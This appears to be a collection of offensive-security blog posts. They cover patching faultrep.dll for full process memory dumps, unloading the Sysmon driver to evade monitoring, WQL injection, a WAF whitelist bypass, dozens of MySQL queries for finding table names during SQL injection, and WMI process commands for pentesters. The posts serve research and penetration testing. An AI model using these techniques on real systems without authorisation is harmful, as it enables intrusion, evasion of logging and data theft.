faultrep.dll!InternalGenerateMinidumpEx(void *,unsigned long,void *,struct tagSMDumpOptions *,unsigned short const *,int)
faultrep.dll!InternalGenerateMinidump(void *,unsigned long,unsigned short const *,struct tagSMDumpOptions *,int)
faultrep.dll!CreateMinidumpW(unsigned long,unsigned short const *,struct tagSMDumpOptions *)

As you see it calls the dbghelp!MiniDumpWriteDump by loading the dbghelp.dll using the LoadLibraryExW API.

However, this function ‘faultrep.dll!InternalGenerateMinidumpEx’ doesn’t provide a full dump. As you can see it passes 0x21 or it compares the 3rd argument which is a structure and based on that value it passes 0x325.

0x21 = MiniDumpWithDataSegs | MiniDumpWithUnloadedModules

0x325 = MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData | MiniDumpWithUnloadedModules

What you could do is, patch it to a 0x2 to make it a ‘MiniDumpWithFullMemory’. You can find the 64-bit version of the patched DLL from here https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump

This is the PoC of calling this API. You can copy the DLL from Windows XP and it will work fine. Not sure how this is useful. Just sharing what I found 🙂

 

UPDATE: I wrote a hot patch for both 32-bit and 64-bit faultrep DLLs. It will allow you to get a full process dump passing MiniDumpWithFullMemory as the MINIDUMP_TYPE. Tested on Windows XP 32-bit and 64-bit. On other systems by copying the original DLLs in the same folder will work fine. You can find the repo with DLL files from here https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump/Hot%20Patch

Some uses 😉

I was in an engagement today and tried with success the CreateMinidump_HotPatch of @OsandaMalith in both win2003 x32 and Win10 x64. Especially in Windows 10 Symantec did not complain at all!!! pic.twitter.com/kKS1KqEqpa

— Spiros Fraganastasis (@m3g9tr0n) September 10, 2019



Unloading the Sysmon Minifilter Driver

22 September 2019 at 14:51

The binary fltMC.exe is used to manage minifilter drivers. You can easily load and unload minifilters using this binary. To unload the Sysmon driver you can use:

fltMC unload SysmonDrv

If this binary is flagged, we can unload the minifilter driver by calling the ‘FilterUnload’ which is the Win32 equivalent of ‘FltUnloadFilter’. It will call the minifilter’s ‘FilterUnloadCallback’ (PFLT_FILTER_UNLOAD_CALLBACK) routine. This is as same as using fltMC which is a Non-mandatory unload.
For calling this API SeLoadDriverPrivilege is required. To obtain this privelege adminsitrative permissions are required.

Here’s a simple C code I wrote to call the ‘FilterUnload’ API.

https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c

[gist https://gist.github.com/OsandaMalith/3315bc640ff51227ab067052bc20a445]

Note that when unloading a minifilter driver by the FilterManager, it will be logged under the System log.

References:
https://www.osr.com/nt-insider/2017-issue2/introduction-standard-isolation-minifilters/

WQL Injection

6 October 2019 at 21:59

Generally in application security, the user input must be sanitized. When it comes to SQL injection the root cause most of the time is because the input not being sanitized properly. I was curious about Windows Management Instrumentation Query Language – WQL which is the SQL for WMI. Can we abuse WQL if the input is not sanitized?

I wrote a simple application in C++ which gets the service information from the Win32_Service class. It will display members such as Name, ProcessId, PathName, Description, etc.

This is the WQL Query.

SELECT * FROM win32_service where Name='User Input'

As you can see I am using the IWbemServices::ExecQuery method to execute the query and enumerte its members using the IEnumWbemClassObject::Next method.

BSTR input = L"SELECT * FROM win32_service where Name='User Input'";

if (FAILED(hRes = pService->ExecQuery(L"WQL", input, WBEM_FLAG_FORWARD_ONLY, NULL, &pEnumerator))) {
	pLocator->Release();
	pService->Release();
	cout << "Unable to retrive Services: 0x" << std::hex << hRes << endl;
	return 1;
}

IWbemClassObject* clsObj = NULL;
int numElems;
while ((hRes = pEnumerator->Next(WBEM_INFINITE, 1, &clsObj, (ULONG*)&numElems)) != WBEM_S_FALSE) {
	if (FAILED(hRes)) break;
	VARIANT vRet;
	VariantInit(&vRet);
	if (SUCCEEDED(clsObj->Get(L"Name", 0, &vRet, NULL, NULL))
		&& vRet.vt == VT_BSTR) {
		wcout << L"Name: " << vRet.bstrVal << endl;
		VariantClear(&vRet);
}

Once the user enters a service name the application will display its members.

I was thinking if it’s possible to make the query true and return all the services of the target host. Something like id=1 or 1=1 in SQLi where we make the statement logically true.
Since the user input is not properly sanitized in this case we can use the and keyword and enumerate all the services by using the like keyword.

SELECT * FROM win32_service where Name='Appinfo' or name like '[^]%'

You could simply use “%” as well.

This is just a simple demonstration to prove WQL injection. I’m sure there might be better cases to demonstrate this. However, Extended WQL which is a superset of the WQL can be used to combine statements and do more cool stuff. It’s used by the System Center Configuration Manager – SCCM. Always sanitize the input of the application.

You can download the applications from here to play around.
https://github.com/OsandaMalith/WMI/releases/download/1/WinServiceInfo.7z

Bypassing the WebARX Web Application Firewall (WAF)

12 October 2019 at 22:16

WebARX is a web application firewall where you can protect your website from malicious attacks. As you can see it was mentioned in TheHackerNews as well and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It was found out that the WebARX WAF could be easily bypassed by passing a whitelist string. As you see the request won’t be processed by the WAF if it detects a whitelist string.

Let’s first try on their own website. This is a simple LFi payload.



Now if I include a whitelist string such as ithemes-sync-request it would be easily bypassed.

XSS PoC

Here’s an XSS PoC where we pass a simple script tag. It detects the raw request when we pass normally.

But if we include ithemes-sync-request parameter which is a whitelist string the script tag will get executed.

LFi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

SQLi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

These whitelist strings are more like a kill switch for this firewall. I’m not quite sure the developers of this project understands the logic behind it. It’s more like coded by an amateur programmer for a university assignment.

[tweet https://twitter.com/webarx_security/status/1181655018442760193]

Alternatives to Extract Tables and Columns from MySQL and MariaDB

27 January 2020 at 22:48

I’ve previously published a post on extracting table names when /or/i was filtered which leads to filtering of the word information_schema. I did some more research into this area on my own and found many other tables where you can extract the table names. These are all the databases and tables I found where we can extract table names apart from ‘information_schema.tables’. I have tested the following in 5.7.29 MySQL and 10.3.18 MariaDB. There are 39 queries in total.

Sys

These views were added in MySQL 5.7.9.

mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| db         |
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
6 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| users      |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.03 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| referers   |
| uagents    |
| emails     |
| users      |
| flag       |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.05 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| referers   |
| flag       |
| emails     |
| users      |
| uagents    |
+------------+
5 rows in set (0.14 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.09 sec)

Using these queries, you can get the table file paths stored locally on disk, along with it we can extract the table names.

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\emails.ibd   |
| @@datadir\security\flag.ibd     |
| @@datadir\security\referers.ibd |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\emails.frm   |
| @@datadir\security\flag.frm     |
| @@datadir\security\db.opt       |
+---------------------------------+
11 rows in set (0.22 sec)

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\flag.ibd     |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\flag.frm     |
| @@datadir\security\emails.frm   |
| @@datadir\security\emails.ibd   |
| @@datadir\security\referers.ibd |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\db.opt       |
+---------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

The following tables store the queries used before like a log. You can use regular expressions to find what you need.

mysql> SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| query                                                                                                                             |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                                                                                                 |
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `users`                                                                                            |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
+-----------------------------------------------------------------------------------------------------------------------------------+

mysql> SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
+-----------------------------------------------------------+
| query                                                     |
+-----------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                         |
| SHOW CREATE TABLE `security` . `emails`                   |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW CREATE TABLE `security` . `referers`                 |
| SELECT * FROM `security` . `users` LIMIT ?                |
| SHOW CREATE TABLE `security` . `uagents`                  |
| SHOW CREATE PROCEDURE `security` . `select_first_column`  |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW OPEN TABLES FROM `security` WHERE `in_use` != ?      |
| SHOW TRIGGERS FROM `security`                             |
| USE `security`                                            |
| USE `security`                                            |
+-----------------------------------------------------------+
12 rows in set (0.01 sec)

Performance_Schema

mysql> SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
+---------------------+
| object_name         |
+---------------------+
| emails              |
| referers            |
| uagents             |
| users               |
| flag                |
| select_first_column |
+---------------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
20 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| flag        |
+-------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

As mentioned before the following contains the log of all typed SQL queries. Sometimes you might find table names. For simplicity, I have used regular expressions to match the current database name.

mysql> SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| digest_text                                                                                                                       |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
| SHOW CREATE PROCEDURE `security` . `select_first_column`                                                                          |
| SHOW CREATE TABLE `security` . `uagents`                                                                                          |
+-----------------------------------------------------------------------------------------------------------------------------------+
17 rows in set (0.00 sec)

Like before we are fetching the local table file paths.

mysql> SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

mysql> SELECT file_name FROM `performance_schema`.`file_summary_by_instance` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

MySQL

mysql> SELECT table_name FROM `mysql`.`innodb_table_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT table_name FROM `mysql`.`innodb_index_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| emails     |
| emails     |
| flag       |
| flag       |
| flag       |
| referers   |
| referers   |
| referers   |
| uagents    |
| uagents    |
| uagents    |
| users      |
| users      |
| users      |
+------------+
15 rows in set (0.00 sec)

Information_Schema

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE CONSTRAINT_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

However, the first column value can be retrieved in this case.

mysql> SELECT COLUMN_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+-------------+
| COLUMN_NAME |
+-------------+
| id          |
| id          |
| id          |
| id          |
| id          |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`PARTITIONS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

In this table, you can also use the column ‘column_name’ to get the first column of all tables.

mysql> SELECT TABLE_NAME FROM `information_schema`.`STATISTICS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`TABLE_CONSTRAINTS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT file_name FROM `information_schema`.`FILES` where file_name regexp database();
+-------------------------+
| file_name               |
+-------------------------+
| .\security\emails.ibd   |
| .\security\flag.ibd     |
| .\security\referers.ibd |
| .\security\uagents.ibd  |
| .\security\users.ibd    |
+-------------------------+
5 rows in set (0.00 sec)

Starting from MySQL 5.6 InnoDB exists in Information_Schema.

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE` WHERE TABLE_NAME REGEXP  DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE_LRU` WHERE TABLE_NAME REGEXP DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+
5 rows in set (0.06 sec)

mysql> SELECT path FROM  `information_schema`.`INNODB_SYS_DATAFILES` WHERE path REGEXP DATABASE();
+-------------------------+
| path                    |
+-------------------------+
| .\security\users.ibd    |
| .\security\emails.ibd   |
| .\security\uagents.ibd  |
| .\security\referers.ibd |
| .\security\flag.ibd     |
+-------------------------+
5 rows in set (0.00 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESPACES` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/users    |
| security/emails   |
| security/uagents  |
| security/referers |
| security/flag     |
+-------------------+
5 rows in set (0.04 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESTATS` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/emails   |
| security/flag     |
| security/referers |
| security/uagents  |
| security/users    |
+-------------------+
5 rows in set (0.00 sec)

Column Names

Most of the time people ask me if there’s any method to extract column names? You don’t need to know the column names really.

If you have the error displayed you can straightaway get the number of columns using the below first query which makes the query equals to 1 returning us the error. To determine the number of columns in a boolean blind injection scenario you can do this trick which will return 0 (since the values aren’t equal). After that use the below third query to extract data 🙂

I hope these might come handy in your next pentest 🙂

WMI 101 for Pentesters

26 February 2020 at 15:07

PowerShell has gained popularity with SysAdmins and for good reason. It’s on every Windows machine (and now some Linux machines as well), has capabilities to interact with almost every service on every machine on the network, and it’s a command-line utility. For the same exact reasons, PowerShell has also become a favourite method of attackers interacting with a victim machine. Because of this, organizations have gotten wise to this attack vector and have put measures in place to mitigate its use. But there’s another way! Many don’t know of another built-in Windows utility that actually pre-dates PowerShell and can also help them in their hacking pentesting engagements. That tool is Windows Management Instrumentation (WMI). This tutorial will be a small introduction to not only understand the usage of WMI to enumerate information from local and remote machines, but we’ll also show you how to start and kill processes! So let’s jump into WMI 101 for pentesters.

Background on WMI

I will keep this article at an introductory level to understand how to enumerate information at a high level. But as with most tutorials, let’s define some terms and provide some historical background. This may get dry but stick with me.

Windows Management Instrumentation (WMI) is Microsoft’s implementation of Web-based Business Management Standards (WBEM), the common information model (CIM) and the Distributed Management Task Force (DMTF). Microsoft has officially stated:

Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems.

So what does that mean? Simply, WMI stores a bunch of information about the local machine and allows you to access that data as well as manage Windows computers locally and remotely.

WMI came pre-installed in Windows 2000. It was made available as a download for Windows NT and Windows 95/98. For historical purposes, Monad, was born in 2002 with its first public appearance in 2003. In the spring of 2006, Monad was renamed Windows PowerShell and didn’t make a final release until November of 2006.

By default, WMI can be accessed by the Windows Script Host (WSH) languages such as VBScript and JScript. From Windows 7 PowerShell can be also used to access WMI. Furthermore, the IWbem COM API can be used with C/C++ and the ‘System.Management’ namespace with .Net languages such as C#, VB.Net and F#. Almost every popular programming languages such as Python, Ruby, PHP, Delphi, et al have third-party libraries or built-in libraries which support WMI.

The command-line interface to access WMI is called the Windows Management Instrumentation Command-line (WMIC). However, WMI can also be accessed directly with PowerShell. From PowerShell v3 onwards, CIM (Common Information Model) cmdlets can be found. The CIM cmdlets can be used to interact with WMI over WS-MAN (WinRM). These CIM cmdlets will aid us when WMI is blocked but WinRM is allowed on the target machine.

Exploring Namespaces

WMI namespaces can be explored in several different ways from using WMIC directly or by using PowerShell.

Using WMIC

C:\>wmic /namespace:\\root path __namespace
Name
subscription
DEFAULT
CIMV2
msdtc
Cli
SECURITY
SecurityCenter2
RSOP
District
PEH
StandardCimv2
WMI
directory
Policy
Interop
Hardware
ServiceModel
SecurityCenter
Microsoft
aspnet
Appv

Using PowerShell

Get-WmiObject -namespace "root" -class "__Namespace" | Select Name



Another method is by using WQL, the WMI Query Language. Microsoft’s documentation defines WQL as, “a subset of standard American National Standards Institute Structured Query Language (ANSI SQL) with minor semantic changes to support WMI.” So, we can use commonly understood SQL statement in quotes such as:

Get-WmiObject -Query “Select * from __Namespace” -Namespace Root | select Name

 

Exploring Classes

To get a list of WMI classes of a specific Namespace using PowerShell, we can use the ‘List’ parameter. In this example we are listing the classes of default namespace, ‘root\cimv2’.

PS C:\>Get-WmiObject -Namespace root\cimv2 -List
… Output Omitted …
Win32_ShadowContext {} {Caption, ClientAccessible, Description
Differential...}
Win32_MSIResource {} {Caption, Description, SettingID}
Win32_ServiceControl {} {Arguments, Caption, Description, Event...}
Win32_Property {} {Caption, Description, ProductCode, Property...}
Win32_Patch {} {Attributes, Caption, Description, File...}
Win32_PatchPackage {} {Caption, Description, PatchID, ProductCode...}
… Output Omitted …

Another method is by using “Get-CimClass” cmdlet:

Get-CimClass -Namespace root\cimv2

If we want only the classes that start with “win32” inside the “root\cimv2” namespace, we can use a wildcard like this:

Get-WmiObject -Namespace root\cimv2 -Class *Win32* -List

Furthermore, the tool WMI Explorer can be used to have a better view of the namespaces, classes and methods with descriptions and examples.

In summary, each Namespace contains Classes. Classes contain:

  • Properties – Information that can be retrieved.
  • Methods – Functions that be performed.
  • Instances – Instances of the class objects. Each instance with Methods and Properties.
  • Events – Produces notifications about changes in WMI data and services.

WMI Query Language – WQL

We briefly mentioned WQL in an example above, but let’s dive a little deeper. WQL queries can be directly accessed by the ‘wbemtest.exe’ binary and using PowerShell. WQL is used in scripting languages and programming languages when accessing WMI. For this article I will not go in depth regarding each type, however WQL Queries can be categorized as follows:

  • Instance Queries
  • Event Queries
  • Meta Queries

Once you open the wbemtest binary, click on Connect and create a new connection to the required namespaces as shown above. If you are creating a connection to a remote machine, you can provide the credentials in this dialog box. In this example, I will connect to the default namespace ‘root\cimv2’.

After creating the connection, click on ‘Query’ to test a WQL query. In this example I will use the following query to enumerate files on the disk from the path “C:\temp”

Select * From Cim_DataFile Where Drive = "C:" And Path = "\\temp\\"

It will enumerate the files on the ‘temp´ folder and display the file name.

This is the PowerShell syntax for the same request:

Get-WmiObject -Query 'Select FileName From Cim_DataFile Where Drive = "C:" And Path = "\\temp\\"'

 

WMI Verbs

The following is for usage with WMIC:

  • List – List Information
  • Get – Retrieve values
  • Call – Execute a method
  • Set – Set value of a property
  • Create – Creates a new instance
  • Delete – Deletes an instance
  • Assoc – Displays the Associators

Putting WMI All Together

Using WMIC

The following command can be used to list the aliases used in WMIC for the corresponding WQL Query.

wmic alias list brief

The list is much longer than what you see in the screenshot above. I highly recommend you try this on your own machine to see what I mean. Much lower in the list, you will find the ‘process’ alias, and it uses the “Select * from Win32_Process” WQL query. By using the alias, we can shorten the command in the following way:

wmic process where name='lsass.exe' list brief

In this next example, I am using the ‘get’ verb to retrieve specific properties from the class.

wmic process where name='winword.exe' get name, executablepath

This is an example of using the method ‘GetOwner’ to retrieve the owner of the target process.

wmic process where name='winword.exe' call GetOwner

To create a process we can use the ‘Create’ method. This is widely used by pentesters and in malware to create a remote process.

wmic process call create 'calc.exe'

 

To kill a process the ‘Terminate’ method can be used.

wmic process where name='notepad.exe' call Terminate

Using PowerShell

Now let’s try some similar activities using PowerShell. This time, let’s look for Word.

Get-WmiObject -Class Win32_Process -Filter 'name="winword.exe"'

Next, we’ll filter our data even more to get the information we want.

Get-CimInstance -Class Win32_Process -Filter "name='winword.exe'" -Property Caption, ProcessID, ExecutablePath

 

Using WQL

And how would this look using PowerShell and some WQL? Here, I am selecting the Caption, Process ID and the Executable Path properties from the ‘winword.exe’ process.

Get-WmiObject -Query "Select Caption,ProcessID,ExecutablePath from Win32_Process where name='winword.exe'" -Namespace root\cimv2

Using the CIM cmdlets you can retrieve all information or retrieve a specific property like this:

(Get-CimInstance -Query "Select * from Win32_Process where name='winword.exe'" -Namespace root\cimv2).ProcessID

Listing all the methods of the ‘Win32_Process’ Class can be done like this:

(Get-WmiObject -Class Win32_Process -List).Methods

For executing a method, the ‘Invoke-WmiMethod’ is used:

